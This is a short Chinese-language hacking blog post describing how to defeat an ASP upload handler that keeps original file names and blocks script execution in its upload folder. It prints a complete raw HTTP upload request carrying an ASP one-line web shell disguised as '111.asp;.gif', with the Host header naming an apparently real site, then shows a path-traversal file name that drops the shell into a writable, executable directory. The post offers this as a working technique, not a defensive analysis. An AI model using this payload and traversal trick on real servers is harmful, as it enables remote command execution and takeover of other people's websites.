upfile又一奇迹般的突破

 不知道各位。在上传的时候。 有没需要过。  一个上传。 不修改名字。。然后上传目录已经被程序所定义了。

然而。上传目录取消了脚本执行的权限。  我想这里估计大家都要放弃了。

如何突破呢?其实是可以的.   关键是   [不修改名字]

先来看看一个上传的数据包:

1. POST /fa-bu/upload/upfile1.asp HTTP/1.1
2. Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
3. Referer: http://xxxxx/fa-bu/upload/upload.asp
4. Accept-Language: zh-cn
5. Content-Type: multipart/form-data; boundary=—————————7da290150c5e
6. Accept-Encoding: gzip, deflate
7. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
8. Host: ec.cnyw.net
9. Content-Length: 448
10. Connection: Keep-Alive
11. Cache-Control: no-cache
12. Cookie: ASPSESSIONIDSSCTCSCT=DJBKGKLBBIGNKJMBGOENNPAN
13. —————————–7da290150c5e
14. Content-Disposition: form-data; name=”act”
15. upload
16. —————————–7da290150c5e
17. Content-Disposition: form-data; name=”file1″; filename=”E:\xxx\xxx\xx\111.asp;.gif”
18. Content-Type: text/plain
19. <%execute(request(“cmd”))%>
20. —————————–7da290150c5e
21. Content-Disposition: form-data; name=”Submit”
22. up
23. —————————–7da290150c5e–

关键是 :

Content-Disposition: form-data; name=”file1″; filename=”E:\xxx\xxx\xx\111.asp;.gif”

我首先呢。  filename他是如何判断 那个开始就是文件名呢?       他是判断filename里的最右边的一个”\”以后的就是文件名字了。

大家因该知道。 在windows下  “\” 和 “/” 是不分家的。

假设上传之后的目录为upload/

然后一个可以执行可以写的目录为 okokok/

那么我们只要构造

Content-Disposition: form-data; name=”file1″; filename=”E:\xxx\xxx\xx\./../okokok/111.asp;.gif”

那么我们上传的文件就成功的传进去了 okokok/111.asp;.gif了。

突破之！

http://www.sb-sb.cn/post/10.html

http://evilcoda.com/archives/398.html